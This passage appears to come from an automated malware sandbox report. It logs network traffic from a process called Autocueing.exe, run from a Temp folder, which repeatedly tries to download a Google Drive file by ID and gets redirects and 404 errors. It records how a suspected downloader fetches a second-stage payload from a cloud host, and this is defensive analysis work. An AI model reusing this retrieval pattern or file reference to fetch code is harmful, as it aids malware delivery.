                                                                                                                                                                                    Jan 11, 2025 05:29:20.082401037 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:20.082453966 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:20.082453966 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:20.082987070 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:20.083005905 CET44350053142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.200793982 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.200851917 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.200989962 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.201328993 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.201347113 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.850526094 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.850735903 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.851262093 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.851475000 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.853377104 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.853405952 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.853710890 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.853782892 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.854269981 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.895334005 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.244891882 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245198965 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245225906 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245277882 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245342970 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245418072 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245476961 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:21.257843971 CET50055443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:21.257886887 CET44350055142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.257966995 CET50055443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:21.258182049 CET50055443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:21.258193970 CET44350055142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.903542995 CET44350055142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.903696060 CET50055443192.168.2.6142.250.185.129

                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Jan 11, 2025 05:27:59.196892977 CET5852753192.168.2.61.1.1.1
                                                                                                                                                                                    Jan 11, 2025 05:27:59.205557108 CET53585271.1.1.1192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:28:00.650902987 CET6124453192.168.2.61.1.1.1
                                                                                                                                                                                    Jan 11, 2025 05:28:00.657697916 CET53612441.1.1.1192.168.2.6

                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Jan 11, 2025 05:27:59.196892977 CET192.168.2.61.1.1.10x49ffStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 11, 2025 05:28:00.650902987 CET192.168.2.61.1.1.10xffe3Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Jan 11, 2025 05:27:59.205557108 CET1.1.1.1192.168.2.60x49ffNo error (0)drive.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 11, 2025 05:28:00.657697916 CET1.1.1.1192.168.2.60xffe3No error (0)drive.usercontent.google.com142.250.185.129A (IP address)IN (0x0001)false

                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                    • drive.google.com
                                                                                                                                                                                    • drive.usercontent.google.com

                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.649942142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:00 UTC216OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2025-01-11 04:28:00 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:00 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-qO4-8CDa-5ag8Bj84718Yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    1192.168.2.649948142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:01 UTC258OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2025-01-11 04:28:01 UTC2218INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQ5tTtxm5wj5DTEv-Nv4jj0VPWutfKq_Jo0teQ30BwXGcVOHnb3buB5hgoMcqA9Ymfn
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:01 GMT
                                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-3bPcayjmvUMClbpbEpuo0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Set-Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4; expires=Sun, 13-Jul-2025 04:28:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 4e 48 73 61 31 58 4d 4b 57 49 4e 4b 6d 76 43 62 71 59 33 4f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jNHsa1XMKWINKmvCbqY3OA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    2192.168.2.649956142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:02 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:03 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:02 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-ppwQ0kynFjLAo3PBTkIRag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    3192.168.2.649964142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:03 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:04 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQhF838aA3jiPeC49oif7aVjz1vtYuDsOlRSZlW8XHrn4MOtjKr8-ICISBWEMMFr0d0
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:04 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-r_MFGG4hWH0BhbXJRdkGjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 56 67 33 57 69 65 4a 6b 78 75 50 78 66 53 5f 66 65 48 5a 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hVg3WieJkxuPxfS_feHZLw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    4192.168.2.649973142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:05 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:05 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:05 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-bRs07ho7qTMamksRrfp2lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    5192.168.2.649981142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:06 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:06 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSfJKVgMCjiq-Wy7DC58_igsZT8tx6OA-1n2rMKLxPXMRNSmtnv0DQQJ0N08Fac9M54
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:06 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-pmEw0zM6_DVKISqZevZ_hA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
